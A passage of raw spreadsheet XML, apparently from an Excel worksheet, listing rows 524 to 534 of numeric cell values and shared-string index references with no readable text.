      <c r="AC524">
        <v>0</v>
      </c>
      <c r="AD524">
        <v>0</v>
      </c>
      <c r="AE524">
        <v>100000</v>
      </c>
      <c r="AF524" t="s">
        <v>4236</v>
      </c>
      <c r="AG524">
        <v>50153</v>
      </c>
      <c r="AH524">
        <v>14</v>
      </c>
      <c r="AJ524">
        <v>220</v>
      </c>
      <c r="AK524" t="s">
        <v>812</v>
      </c>
      <c r="AL524" t="s">
        <v>813</v>
      </c>
      <c r="AM524" t="s">
        <v>4237</v>
      </c>
      <c r="AN524" t="s">
        <v>55</v>
      </c>
      <c r="AO524">
        <v>2001</v>
      </c>
      <c r="AP524" t="s">
        <v>4238</v>
      </c>
      <c r="AQ524" t="s">
        <v>4239</v>
      </c>
      <c r="AR524" t="s">
        <v>4236</v>
      </c>
      <c r="AS524" t="s">
        <v>71</v>
      </c>
      <c r="AT524" t="s">
        <v>58</v>
      </c>
      <c r="AU524">
        <v>26</v>
      </c>
      <c r="AV524">
        <v>1</v>
      </c>
      <c r="AW524">
        <v>45</v>
      </c>
      <c r="AX524">
        <v>65</v>
      </c>
      <c r="AY524">
        <v>28</v>
      </c>
      <c r="AZ524">
        <v>38</v>
      </c>
      <c r="BA524" t="s">
        <v>16882</v>
      </c>
      <c r="BB524" t="s">
        <v>15263</v>
      </c>
      <c r="BC524" t="s">
        <v>13039</v>
      </c>
      <c r="BD524">
        <v>0</v>
      </c>
    </row>
    <row r="525" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A525">
        <v>1487</v>
      </c>
      <c r="B525" t="s">
        <v>4240</v>
      </c>
      <c r="C525" t="s">
        <v>74</v>
      </c>
      <c r="D525" t="s">
        <v>1553</v>
      </c>
      <c r="E525" t="s">
        <v>1215</v>
      </c>
      <c r="F525" t="s">
        <v>4241</v>
      </c>
      <c r="G525" s="1">
        <v>44309</v>
      </c>
      <c r="H525">
        <v>8687</v>
      </c>
      <c r="I525">
        <v>8687</v>
      </c>
      <c r="J525">
        <v>3</v>
      </c>
      <c r="K525">
        <v>1</v>
      </c>
      <c r="L525">
        <v>1</v>
      </c>
      <c r="M525">
        <v>6</v>
      </c>
      <c r="N525">
        <v>0</v>
      </c>
      <c r="O525">
        <v>0</v>
      </c>
      <c r="P525">
        <v>0</v>
      </c>
      <c r="Q525">
        <v>14</v>
      </c>
      <c r="R525">
        <v>0</v>
      </c>
      <c r="S525">
        <v>0</v>
      </c>
      <c r="T525">
        <v>0</v>
      </c>
      <c r="U525">
        <v>1500000</v>
      </c>
      <c r="V525">
        <v>2000</v>
      </c>
      <c r="W525">
        <v>1500</v>
      </c>
      <c r="X525">
        <v>6000</v>
      </c>
      <c r="Y525">
        <v>0</v>
      </c>
      <c r="Z525">
        <v>0</v>
      </c>
      <c r="AA525">
        <v>0</v>
      </c>
      <c r="AB525">
        <v>800</v>
      </c>
      <c r="AC525">
        <v>0</v>
      </c>
      <c r="AD525">
        <v>0</v>
      </c>
      <c r="AE525">
        <v>0</v>
      </c>
      <c r="AF525" t="s">
        <v>4242</v>
      </c>
      <c r="AG525">
        <v>59252</v>
      </c>
      <c r="AH525">
        <v>14</v>
      </c>
      <c r="AJ525">
        <v>204</v>
      </c>
      <c r="AK525" t="s">
        <v>1556</v>
      </c>
      <c r="AL525" t="s">
        <v>1557</v>
      </c>
      <c r="AM525" t="s">
        <v>4243</v>
      </c>
      <c r="AN525" t="s">
        <v>55</v>
      </c>
      <c r="AO525">
        <v>2009</v>
      </c>
      <c r="AP525" t="s">
        <v>4244</v>
      </c>
      <c r="AQ525" t="s">
        <v>4245</v>
      </c>
      <c r="AR525" t="s">
        <v>4246</v>
      </c>
      <c r="AS525" t="s">
        <v>71</v>
      </c>
      <c r="AT525" t="s">
        <v>58</v>
      </c>
      <c r="AU525">
        <v>25</v>
      </c>
      <c r="AV525">
        <v>2</v>
      </c>
      <c r="AW525">
        <v>210</v>
      </c>
      <c r="AX525">
        <v>367</v>
      </c>
      <c r="AY525">
        <v>18</v>
      </c>
      <c r="AZ525">
        <v>47</v>
      </c>
      <c r="BA525" t="s">
        <v>16910</v>
      </c>
      <c r="BB525" t="s">
        <v>15315</v>
      </c>
      <c r="BC525">
        <v>0</v>
      </c>
      <c r="BD525" t="s">
        <v>12995</v>
      </c>
    </row>
    <row r="526" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A526">
        <v>1619</v>
      </c>
      <c r="B526" t="s">
        <v>4247</v>
      </c>
      <c r="C526" t="s">
        <v>168</v>
      </c>
      <c r="D526" t="s">
        <v>4248</v>
      </c>
      <c r="E526" t="s">
        <v>49</v>
      </c>
      <c r="F526" t="s">
        <v>3673</v>
      </c>
      <c r="G526" s="1">
        <v>44287</v>
      </c>
      <c r="H526">
        <v>8713</v>
      </c>
      <c r="I526">
        <v>8713</v>
      </c>
      <c r="J526">
        <v>0</v>
      </c>
      <c r="K526">
        <v>0</v>
      </c>
      <c r="L526">
        <v>0</v>
      </c>
      <c r="M526">
        <v>0</v>
      </c>
      <c r="N526">
        <v>0</v>
      </c>
      <c r="O526">
        <v>0</v>
      </c>
      <c r="P526">
        <v>0</v>
      </c>
      <c r="Q526">
        <v>0</v>
      </c>
      <c r="R526">
        <v>0</v>
      </c>
      <c r="S526">
        <v>0</v>
      </c>
      <c r="T526">
        <v>1</v>
      </c>
      <c r="U526">
        <v>0</v>
      </c>
      <c r="V526">
        <v>0</v>
      </c>
      <c r="W526">
        <v>0</v>
      </c>
      <c r="X526">
        <v>0</v>
      </c>
      <c r="Y526">
        <v>0</v>
      </c>
      <c r="Z526">
        <v>0</v>
      </c>
      <c r="AA526">
        <v>0</v>
      </c>
      <c r="AB526">
        <v>0</v>
      </c>
      <c r="AC526">
        <v>0</v>
      </c>
      <c r="AD526">
        <v>0</v>
      </c>
      <c r="AE526">
        <v>12000</v>
      </c>
      <c r="AF526" t="s">
        <v>4249</v>
      </c>
      <c r="AG526">
        <v>45113</v>
      </c>
      <c r="AH526">
        <v>13</v>
      </c>
      <c r="AJ526">
        <v>169</v>
      </c>
      <c r="AK526" t="s">
        <v>4250</v>
      </c>
      <c r="AL526" t="s">
        <v>4251</v>
      </c>
      <c r="AM526" t="s">
        <v>4252</v>
      </c>
      <c r="AN526" t="s">
        <v>55</v>
      </c>
      <c r="AO526">
        <v>1986</v>
      </c>
      <c r="AP526" t="s">
        <v>4253</v>
      </c>
      <c r="AQ526" t="s">
        <v>4254</v>
      </c>
      <c r="AR526" t="s">
        <v>4249</v>
      </c>
      <c r="AS526" t="s">
        <v>71</v>
      </c>
      <c r="AT526" t="s">
        <v>58</v>
      </c>
      <c r="AU526">
        <v>26</v>
      </c>
      <c r="AV526">
        <v>1</v>
      </c>
      <c r="AW526">
        <v>0</v>
      </c>
      <c r="AX526">
        <v>0</v>
      </c>
      <c r="AY526">
        <v>9</v>
      </c>
      <c r="AZ526">
        <v>1</v>
      </c>
      <c r="BA526" t="s">
        <v>16952</v>
      </c>
      <c r="BB526" t="s">
        <v>15407</v>
      </c>
      <c r="BC526">
        <v>0</v>
      </c>
      <c r="BD526" t="s">
        <v>10018</v>
      </c>
    </row>
    <row r="527" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A527">
        <v>1497</v>
      </c>
      <c r="B527" t="s">
        <v>4255</v>
      </c>
      <c r="C527" t="s">
        <v>168</v>
      </c>
      <c r="D527" t="s">
        <v>4256</v>
      </c>
      <c r="E527" t="s">
        <v>4257</v>
      </c>
      <c r="F527" t="s">
        <v>4258</v>
      </c>
      <c r="G527" s="1">
        <v>44292</v>
      </c>
      <c r="H527">
        <v>8798</v>
      </c>
      <c r="I527">
        <v>8798</v>
      </c>
      <c r="J527">
        <v>0</v>
      </c>
      <c r="K527">
        <v>0</v>
      </c>
      <c r="L527">
        <v>0</v>
      </c>
      <c r="M527">
        <v>0</v>
      </c>
      <c r="N527">
        <v>0</v>
      </c>
      <c r="O527">
        <v>0</v>
      </c>
      <c r="P527">
        <v>0</v>
      </c>
      <c r="Q527">
        <v>0</v>
      </c>
      <c r="R527">
        <v>0</v>
      </c>
      <c r="S527">
        <v>0</v>
      </c>
      <c r="T527">
        <v>1</v>
      </c>
      <c r="U527">
        <v>0</v>
      </c>
      <c r="V527">
        <v>0</v>
      </c>
      <c r="W527">
        <v>0</v>
      </c>
      <c r="X527">
        <v>0</v>
      </c>
      <c r="Y527">
        <v>0</v>
      </c>
      <c r="Z527">
        <v>0</v>
      </c>
      <c r="AA527">
        <v>0</v>
      </c>
      <c r="AB527">
        <v>0</v>
      </c>
      <c r="AC527">
        <v>0</v>
      </c>
      <c r="AD527">
        <v>0</v>
      </c>
      <c r="AE527">
        <v>5000</v>
      </c>
      <c r="AF527" t="s">
        <v>4259</v>
      </c>
      <c r="AG527">
        <v>45173</v>
      </c>
      <c r="AH527">
        <v>13</v>
      </c>
      <c r="AJ527">
        <v>169</v>
      </c>
      <c r="AK527" t="s">
        <v>1723</v>
      </c>
      <c r="AL527" t="s">
        <v>4260</v>
      </c>
      <c r="AM527" t="s">
        <v>4261</v>
      </c>
      <c r="AN527" t="s">
        <v>55</v>
      </c>
      <c r="AO527">
        <v>2014</v>
      </c>
      <c r="AP527" t="s">
        <v>4262</v>
      </c>
      <c r="AQ527" t="s">
        <v>4263</v>
      </c>
      <c r="AR527" t="s">
        <v>4259</v>
      </c>
      <c r="AS527" t="s">
        <v>71</v>
      </c>
      <c r="AT527" t="s">
        <v>58</v>
      </c>
      <c r="AU527">
        <v>26</v>
      </c>
      <c r="AV527">
        <v>0</v>
      </c>
      <c r="AW527">
        <v>10</v>
      </c>
      <c r="AX527">
        <v>50</v>
      </c>
      <c r="AY527">
        <v>11</v>
      </c>
      <c r="AZ527">
        <v>4</v>
      </c>
      <c r="BA527" t="s">
        <v>16914</v>
      </c>
      <c r="BB527" t="s">
        <v>15320</v>
      </c>
      <c r="BC527">
        <v>0</v>
      </c>
      <c r="BD527" t="s">
        <v>13231</v>
      </c>
    </row>
    <row r="528" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A528">
        <v>1675</v>
      </c>
      <c r="B528" t="s">
        <v>4264</v>
      </c>
      <c r="C528" t="s">
        <v>477</v>
      </c>
      <c r="D528" t="s">
        <v>4265</v>
      </c>
      <c r="E528" t="s">
        <v>111</v>
      </c>
      <c r="F528" t="s">
        <v>2984</v>
      </c>
      <c r="G528" s="1">
        <v>44287</v>
      </c>
      <c r="H528">
        <v>8926</v>
      </c>
      <c r="I528">
        <v>8926</v>
      </c>
      <c r="J528">
        <v>5</v>
      </c>
      <c r="K528">
        <v>0</v>
      </c>
      <c r="L528">
        <v>25</v>
      </c>
      <c r="M528">
        <v>0</v>
      </c>
      <c r="N528">
        <v>0</v>
      </c>
      <c r="O528">
        <v>1</v>
      </c>
      <c r="P528">
        <v>0</v>
      </c>
      <c r="Q528">
        <v>2</v>
      </c>
      <c r="R528">
        <v>20</v>
      </c>
      <c r="S528">
        <v>0</v>
      </c>
      <c r="T528">
        <v>2</v>
      </c>
      <c r="U528">
        <v>1</v>
      </c>
      <c r="V528">
        <v>0</v>
      </c>
      <c r="W528">
        <v>101</v>
      </c>
      <c r="X528">
        <v>0</v>
      </c>
      <c r="Y528">
        <v>0</v>
      </c>
      <c r="Z528">
        <v>35</v>
      </c>
      <c r="AA528">
        <v>0</v>
      </c>
      <c r="AB528">
        <v>0</v>
      </c>
      <c r="AC528">
        <v>15</v>
      </c>
      <c r="AD528">
        <v>0</v>
      </c>
      <c r="AE528">
        <v>0</v>
      </c>
      <c r="AF528" t="s">
        <v>3611</v>
      </c>
      <c r="AG528">
        <v>95526</v>
      </c>
      <c r="AH528">
        <v>29</v>
      </c>
      <c r="AJ528">
        <v>383</v>
      </c>
      <c r="AK528" t="s">
        <v>2986</v>
      </c>
      <c r="AL528" t="s">
        <v>4222</v>
      </c>
      <c r="AM528" t="s">
        <v>4266</v>
      </c>
      <c r="AN528" t="s">
        <v>82</v>
      </c>
      <c r="AO528">
        <v>2014</v>
      </c>
      <c r="AP528" t="s">
        <v>4267</v>
      </c>
      <c r="AQ528" t="s">
        <v>4268</v>
      </c>
      <c r="AR528" t="s">
        <v>3611</v>
      </c>
      <c r="AS528" t="s">
        <v>71</v>
      </c>
      <c r="AT528" t="s">
        <v>86</v>
      </c>
      <c r="AU528">
        <v>25</v>
      </c>
      <c r="AV528">
        <v>3</v>
      </c>
      <c r="AW528">
        <v>77</v>
      </c>
      <c r="AX528">
        <v>22</v>
      </c>
      <c r="AY528">
        <v>21</v>
      </c>
      <c r="AZ528">
        <v>20</v>
      </c>
      <c r="BA528" t="s">
        <v>16967</v>
      </c>
      <c r="BB528" t="s">
        <v>15442</v>
      </c>
      <c r="BC528" t="s">
        <v>9550</v>
      </c>
      <c r="BD528">
        <v>0</v>
      </c>
    </row>
    <row r="529" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A529">
        <v>1391</v>
      </c>
      <c r="B529" t="s">
        <v>4269</v>
      </c>
      <c r="C529" t="s">
        <v>2848</v>
      </c>
      <c r="D529" t="s">
        <v>4270</v>
      </c>
      <c r="E529" t="s">
        <v>49</v>
      </c>
      <c r="F529" t="s">
        <v>4271</v>
      </c>
      <c r="G529" s="1">
        <v>44258</v>
      </c>
      <c r="H529">
        <v>8929</v>
      </c>
      <c r="I529">
        <v>8929</v>
      </c>
      <c r="J529">
        <v>2</v>
      </c>
      <c r="K529">
        <v>1</v>
      </c>
      <c r="L529">
        <v>0</v>
      </c>
      <c r="M529">
        <v>0</v>
      </c>
      <c r="N529">
        <v>0</v>
      </c>
      <c r="O529">
        <v>0</v>
      </c>
      <c r="P529">
        <v>0</v>
      </c>
      <c r="Q529">
        <v>0</v>
      </c>
      <c r="R529">
        <v>5</v>
      </c>
      <c r="S529">
        <v>0</v>
      </c>
      <c r="T529">
        <v>1</v>
      </c>
      <c r="U529">
        <v>140</v>
      </c>
      <c r="V529">
        <v>100</v>
      </c>
      <c r="W529">
        <v>0</v>
      </c>
      <c r="X529">
        <v>0</v>
      </c>
      <c r="Y529">
        <v>0</v>
      </c>
      <c r="Z529">
        <v>0</v>
      </c>
      <c r="AA529">
        <v>0</v>
      </c>
      <c r="AB529">
        <v>0</v>
      </c>
      <c r="AC529">
        <v>200</v>
      </c>
      <c r="AD529">
        <v>0</v>
      </c>
      <c r="AE529">
        <v>300</v>
      </c>
      <c r="AF529" t="s">
        <v>4272</v>
      </c>
      <c r="AG529">
        <v>30255</v>
      </c>
      <c r="AH529">
        <v>9</v>
      </c>
      <c r="AJ529">
        <v>112</v>
      </c>
      <c r="AK529" t="s">
        <v>4273</v>
      </c>
      <c r="AL529" t="s">
        <v>4274</v>
      </c>
      <c r="AM529" t="s">
        <v>4275</v>
      </c>
      <c r="AN529" t="s">
        <v>68</v>
      </c>
      <c r="AO529">
        <v>2001</v>
      </c>
      <c r="AP529" t="s">
        <v>4276</v>
      </c>
      <c r="AQ529" t="s">
        <v>4277</v>
      </c>
      <c r="AR529" t="s">
        <v>4272</v>
      </c>
      <c r="AS529" t="s">
        <v>71</v>
      </c>
      <c r="AT529" t="s">
        <v>72</v>
      </c>
      <c r="AU529">
        <v>30</v>
      </c>
      <c r="AV529">
        <v>0</v>
      </c>
      <c r="AW529">
        <v>0</v>
      </c>
      <c r="AX529">
        <v>10</v>
      </c>
      <c r="AY529">
        <v>0</v>
      </c>
      <c r="AZ529">
        <v>0</v>
      </c>
      <c r="BA529" t="s">
        <v>16106</v>
      </c>
      <c r="BB529" t="s">
        <v>16106</v>
      </c>
      <c r="BC529" t="s">
        <v>10448</v>
      </c>
      <c r="BD529">
        <v>0</v>
      </c>
    </row>
    <row r="530" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A530">
        <v>1637</v>
      </c>
      <c r="B530" t="s">
        <v>4278</v>
      </c>
      <c r="C530" t="s">
        <v>88</v>
      </c>
      <c r="D530" t="s">
        <v>4279</v>
      </c>
      <c r="E530" t="s">
        <v>916</v>
      </c>
      <c r="F530" t="s">
        <v>4280</v>
      </c>
      <c r="G530" s="1">
        <v>44347</v>
      </c>
      <c r="H530">
        <v>8956</v>
      </c>
      <c r="I530">
        <v>8956</v>
      </c>
      <c r="J530">
        <v>0</v>
      </c>
      <c r="K530">
        <v>0</v>
      </c>
      <c r="L530">
        <v>0</v>
      </c>
      <c r="M530">
        <v>0</v>
      </c>
      <c r="N530">
        <v>0</v>
      </c>
      <c r="O530">
        <v>0</v>
      </c>
      <c r="P530">
        <v>0</v>
      </c>
      <c r="Q530">
        <v>0</v>
      </c>
      <c r="R530">
        <v>0</v>
      </c>
      <c r="S530">
        <v>0</v>
      </c>
      <c r="T530">
        <v>2</v>
      </c>
      <c r="U530">
        <v>0</v>
      </c>
      <c r="V530">
        <v>0</v>
      </c>
      <c r="W530">
        <v>0</v>
      </c>
      <c r="X530">
        <v>0</v>
      </c>
      <c r="Y530">
        <v>0</v>
      </c>
      <c r="Z530">
        <v>0</v>
      </c>
      <c r="AA530">
        <v>0</v>
      </c>
      <c r="AB530">
        <v>0</v>
      </c>
      <c r="AC530">
        <v>0</v>
      </c>
      <c r="AD530">
        <v>0</v>
      </c>
      <c r="AE530">
        <v>120000</v>
      </c>
      <c r="AF530" t="s">
        <v>4281</v>
      </c>
      <c r="AG530">
        <v>81155</v>
      </c>
      <c r="AH530">
        <v>17</v>
      </c>
      <c r="AJ530">
        <v>281</v>
      </c>
      <c r="AK530" t="s">
        <v>2086</v>
      </c>
      <c r="AL530" t="s">
        <v>4282</v>
      </c>
      <c r="AM530" t="s">
        <v>4283</v>
      </c>
      <c r="AN530" t="s">
        <v>55</v>
      </c>
      <c r="AO530">
        <v>2016</v>
      </c>
      <c r="AP530">
        <v>85333929814</v>
      </c>
      <c r="AQ530" t="s">
        <v>4284</v>
      </c>
      <c r="AR530" t="s">
        <v>4281</v>
      </c>
      <c r="AS530" t="s">
        <v>371</v>
      </c>
      <c r="AT530" t="s">
        <v>58</v>
      </c>
      <c r="AU530">
        <v>24</v>
      </c>
      <c r="AV530">
        <v>2</v>
      </c>
      <c r="AW530">
        <v>0</v>
      </c>
      <c r="AX530">
        <v>0</v>
      </c>
      <c r="AY530">
        <v>15</v>
      </c>
      <c r="AZ530">
        <v>4</v>
      </c>
      <c r="BA530" t="s">
        <v>16957</v>
      </c>
      <c r="BB530" t="s">
        <v>15417</v>
      </c>
      <c r="BC530">
        <v>0</v>
      </c>
      <c r="BD530" t="s">
        <v>10412</v>
      </c>
    </row>
    <row r="531" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A531">
        <v>1327</v>
      </c>
      <c r="B531" t="s">
        <v>4285</v>
      </c>
      <c r="C531" t="s">
        <v>99</v>
      </c>
      <c r="D531" t="s">
        <v>4286</v>
      </c>
      <c r="E531" t="s">
        <v>142</v>
      </c>
      <c r="F531" t="s">
        <v>2244</v>
      </c>
      <c r="G531" s="1">
        <v>44287</v>
      </c>
      <c r="H531">
        <v>8959</v>
      </c>
      <c r="I531">
        <v>8959</v>
      </c>
      <c r="J531">
        <v>1</v>
      </c>
      <c r="K531">
        <v>0</v>
      </c>
      <c r="L531">
        <v>0</v>
      </c>
      <c r="M531">
        <v>0</v>
      </c>
      <c r="N531">
        <v>0</v>
      </c>
      <c r="O531">
        <v>0</v>
      </c>
      <c r="P531">
        <v>0</v>
      </c>
      <c r="Q531">
        <v>0</v>
      </c>
      <c r="R531">
        <v>1</v>
      </c>
      <c r="S531">
        <v>1</v>
      </c>
      <c r="T531">
        <v>0</v>
      </c>
      <c r="U531">
        <v>1</v>
      </c>
      <c r="V531">
        <v>0</v>
      </c>
      <c r="W531">
        <v>0</v>
      </c>
      <c r="X531">
        <v>0</v>
      </c>
      <c r="Y531">
        <v>0</v>
      </c>
      <c r="Z531">
        <v>0</v>
      </c>
      <c r="AA531">
        <v>0</v>
      </c>
      <c r="AB531">
        <v>0</v>
      </c>
      <c r="AC531">
        <v>100000</v>
      </c>
      <c r="AD531">
        <v>1</v>
      </c>
      <c r="AE531">
        <v>0</v>
      </c>
      <c r="AF531" t="s">
        <v>1488</v>
      </c>
      <c r="AG531">
        <v>14440</v>
      </c>
      <c r="AH531">
        <v>12</v>
      </c>
      <c r="AJ531">
        <v>160</v>
      </c>
      <c r="AK531" t="s">
        <v>114</v>
      </c>
      <c r="AL531" t="s">
        <v>114</v>
      </c>
      <c r="AM531" t="s">
        <v>4287</v>
      </c>
      <c r="AN531" t="s">
        <v>82</v>
      </c>
      <c r="AO531">
        <v>2007</v>
      </c>
      <c r="AP531" t="s">
        <v>4288</v>
      </c>
      <c r="AQ531" t="s">
        <v>4289</v>
      </c>
      <c r="AR531" t="s">
        <v>1492</v>
      </c>
      <c r="AS531" t="s">
        <v>71</v>
      </c>
      <c r="AT531" t="s">
        <v>86</v>
      </c>
      <c r="AU531">
        <v>26</v>
      </c>
      <c r="AV531">
        <v>0</v>
      </c>
      <c r="AW531">
        <v>0</v>
      </c>
      <c r="AX531">
        <v>0</v>
      </c>
      <c r="AY531">
        <v>36</v>
      </c>
      <c r="AZ531">
        <v>21</v>
      </c>
      <c r="BA531" t="s">
        <v>16638</v>
      </c>
      <c r="BB531" t="s">
        <v>14377</v>
      </c>
      <c r="BC531" t="s">
        <v>13148</v>
      </c>
      <c r="BD531" t="s">
        <v>13149</v>
      </c>
    </row>
    <row r="532" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A532">
        <v>1668</v>
      </c>
      <c r="B532" t="s">
        <v>4290</v>
      </c>
      <c r="C532" t="s">
        <v>318</v>
      </c>
      <c r="D532" t="s">
        <v>4291</v>
      </c>
      <c r="E532" t="s">
        <v>944</v>
      </c>
      <c r="F532" t="s">
        <v>385</v>
      </c>
      <c r="G532" s="1">
        <v>44271</v>
      </c>
      <c r="H532">
        <v>8986</v>
      </c>
      <c r="I532">
        <v>8986</v>
      </c>
      <c r="J532">
        <v>0</v>
      </c>
      <c r="K532">
        <v>3</v>
      </c>
      <c r="L532">
        <v>0</v>
      </c>
      <c r="M532">
        <v>0</v>
      </c>
      <c r="N532">
        <v>0</v>
      </c>
      <c r="O532">
        <v>0</v>
      </c>
      <c r="P532">
        <v>2</v>
      </c>
      <c r="Q532">
        <v>0</v>
      </c>
      <c r="R532">
        <v>0</v>
      </c>
      <c r="S532">
        <v>0</v>
      </c>
      <c r="T532">
        <v>0</v>
      </c>
      <c r="U532">
        <v>0</v>
      </c>
      <c r="V532">
        <v>68500</v>
      </c>
      <c r="W532">
        <v>0</v>
      </c>
      <c r="X532">
        <v>0</v>
      </c>
      <c r="Y532">
        <v>0</v>
      </c>
      <c r="Z532">
        <v>0</v>
      </c>
      <c r="AA532">
        <v>1800</v>
      </c>
      <c r="AB532">
        <v>0</v>
      </c>
      <c r="AC532">
        <v>0</v>
      </c>
      <c r="AD532">
        <v>0</v>
      </c>
      <c r="AE532">
        <v>0</v>
      </c>
      <c r="AF532" t="s">
        <v>4292</v>
      </c>
      <c r="AG532">
        <v>90241</v>
      </c>
      <c r="AH532">
        <v>26</v>
      </c>
      <c r="AJ532">
        <v>420</v>
      </c>
      <c r="AK532" t="s">
        <v>331</v>
      </c>
      <c r="AL532" t="s">
        <v>332</v>
      </c>
      <c r="AM532" t="s">
        <v>4293</v>
      </c>
      <c r="AN532" t="s">
        <v>82</v>
      </c>
      <c r="AO532">
        <v>2008</v>
      </c>
      <c r="AP532" t="s">
        <v>4294</v>
      </c>
      <c r="AQ532" t="s">
        <v>4295</v>
      </c>
      <c r="AR532" t="s">
        <v>4292</v>
      </c>
      <c r="AS532" t="s">
        <v>71</v>
      </c>
      <c r="AT532" t="s">
        <v>86</v>
      </c>
      <c r="AU532">
        <v>25</v>
      </c>
      <c r="AV532">
        <v>3</v>
      </c>
      <c r="AW532">
        <v>22</v>
      </c>
      <c r="AX532">
        <v>165</v>
      </c>
      <c r="AY532">
        <v>53</v>
      </c>
      <c r="AZ532">
        <v>40</v>
      </c>
      <c r="BA532" t="s">
        <v>16966</v>
      </c>
      <c r="BB532" t="s">
        <v>15437</v>
      </c>
      <c r="BC532">
        <v>0</v>
      </c>
      <c r="BD532" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="533" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A533">
        <v>1463</v>
      </c>
      <c r="B533" t="s">
        <v>4296</v>
      </c>
      <c r="C533" t="s">
        <v>129</v>
      </c>
      <c r="D533" t="s">
        <v>4297</v>
      </c>
      <c r="E533" t="s">
        <v>142</v>
      </c>
      <c r="F533" t="s">
        <v>666</v>
      </c>
      <c r="G533" s="1">
        <v>44302</v>
      </c>
      <c r="H533">
        <v>9018</v>
      </c>
      <c r="I533">
        <v>9018</v>
      </c>
      <c r="J533">
        <v>1</v>
      </c>
      <c r="K533">
        <v>1</v>
      </c>
      <c r="L533">
        <v>0</v>
      </c>
      <c r="M533">
        <v>0</v>
      </c>
      <c r="N533">
        <v>0</v>
      </c>
      <c r="O533">
        <v>0</v>
      </c>
      <c r="P533">
        <v>0</v>
      </c>
      <c r="Q533">
        <v>0</v>
      </c>
      <c r="R533">
        <v>0</v>
      </c>
      <c r="S533">
        <v>1</v>
      </c>
      <c r="T533">
        <v>0</v>
      </c>
      <c r="U533">
        <v>500</v>
      </c>
      <c r="V533">
        <v>500</v>
      </c>
      <c r="W533">
        <v>0</v>
      </c>
      <c r="X533">
        <v>0</v>
      </c>
      <c r="Y533">
        <v>0</v>
      </c>
      <c r="Z533">
        <v>0</v>
      </c>
      <c r="AA533">
        <v>0</v>
      </c>
      <c r="AB533">
        <v>0</v>
      </c>
      <c r="AC533">
        <v>0</v>
      </c>
      <c r="AD533">
        <v>1</v>
      </c>
      <c r="AE533">
        <v>0</v>
      </c>
      <c r="AF533" t="s">
        <v>4298</v>
      </c>
      <c r="AG533">
        <v>0</v>
      </c>
      <c r="AH533">
        <v>11</v>
      </c>
      <c r="AJ533">
        <v>268</v>
      </c>
      <c r="AK533" t="s">
        <v>252</v>
      </c>
      <c r="AL533" t="s">
        <v>253</v>
      </c>
      <c r="AM533" t="s">
        <v>4299</v>
      </c>
      <c r="AN533" t="s">
        <v>55</v>
      </c>
      <c r="AO533">
        <v>2016</v>
      </c>
      <c r="AP533" t="s">
        <v>4300</v>
      </c>
      <c r="AQ533" t="s">
        <v>4301</v>
      </c>
      <c r="AR533" t="s">
        <v>4298</v>
      </c>
      <c r="AS533" t="s">
        <v>179</v>
      </c>
      <c r="AT533" t="s">
        <v>58</v>
      </c>
      <c r="AU533">
        <v>6</v>
      </c>
      <c r="AV533">
        <v>1</v>
      </c>
      <c r="AW533">
        <v>14</v>
      </c>
      <c r="AX533">
        <v>6</v>
      </c>
      <c r="AY533">
        <v>10</v>
      </c>
      <c r="AZ533">
        <v>5</v>
      </c>
      <c r="BA533" t="s">
        <v>16904</v>
      </c>
      <c r="BB533" t="s">
        <v>15296</v>
      </c>
      <c r="BC533" t="s">
        <v>9550</v>
      </c>
      <c r="BD533" t="s">
        <v>13400</v>
      </c>
    </row>
    <row r="534" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A534">
        <v>1455</v>
      </c>
      <c r="B534" t="s">
        <v>4302</v>
      </c>
      <c r="C534" t="s">
        <v>74</v>
      </c>
      <c r="D534" t="s">
        <v>4303</v>
      </c>
      <c r="E534" t="s">
        <v>4304</v>
      </c>
      <c r="F534" t="s">
        <v>4305</v>
      </c>
      <c r="G534" s="1">
        <v>44272</v>
      </c>
      <c r="H534">
        <v>9023</v>
      </c>
      <c r="I534">
        <v>9023</v>
      </c>
      <c r="J534">
        <v>3</v>
      </c>
      <c r="K534">
        <v>3</v>
      </c>
      <c r="L534">
        <v>1</v>
      </c>
      <c r="M534">
        <v>0</v>
      </c>
      <c r="N534">
        <v>0</v>
      </c>
      <c r="O534">
        <v>0</v>
      </c>
      <c r="P534">
        <v>0</v>
      </c>
      <c r="Q534">
        <v>10</v>
      </c>
      <c r="R534">
        <v>4</v>
      </c>
      <c r="S534">
        <v>0</v>
      </c>
      <c r="T534">
        <v>1</v>
      </c>
      <c r="U534">
        <v>225000</v>
      </c>
      <c r="V534">
        <v>3000</v>
      </c>
      <c r="W534">
        <v>1200</v>
      </c>
      <c r="X534">
        <v>0</v>
      </c>
      <c r="Y534">
        <v>0</v>
      </c>
      <c r="Z534">
        <v>0</v>
      </c>
      <c r="AA534">
        <v>0</v>
      </c>
      <c r="AB534">
        <v>200</v>
      </c>
      <c r="AC534">
        <v>2000</v>
      </c>
      <c r="AD534">
        <v>0</v>
      </c>
      <c r="AE534">
        <v>100</v>
      </c>
      <c r="AF534" t="s">
        <v>4306</v>
      </c>
      <c r="AG534">
        <v>59119</v>
      </c>
      <c r="AH534">
        <v>14</v>
      </c>
      <c r="AJ534">
        <v>205</v>
      </c>
      <c r="AK534" t="s">
        <v>1938</v>
      </c>
      <c r="AL534" t="s">
        <v>4307</v>
      </c>
      <c r="AM534" t="s">
        <v>4308</v>
      </c>
      <c r="AN534" t="s">
        <v>55</v>
      </c>
      <c r="AO534">
        <v>2011</v>
      </c>
      <c r="AP534" t="s">
        <v>4309</v>
      </c>
      <c r="AQ534" t="s">
        <v>4310</v>
      </c>
      <c r="AR534" t="s">
        <v>4311</v>
      </c>
      <c r="AS534" t="s">
        <v>71</v>
      </c>
      <c r="AT534" t="s">
        <v>58</v>
      </c>
      <c r="AU534">
        <v>6</v>
      </c>
      <c r="AV534">
        <v>1</v>
      </c>
      <c r="AW534">
        <v>40</v>
      </c>
      <c r="AX534">
        <v>39</v>
      </c>
      <c r="AY534">
        <v>5</v>
      </c>
      <c r="AZ534">
        <v>4</v>
      </c>
      <c r="BA534" t="s">
        <v>16901</v>
      </c>
      <c r="BB534" t="s">
        <v>15290</v>
      </c>
      <c r="BC534" t="s">
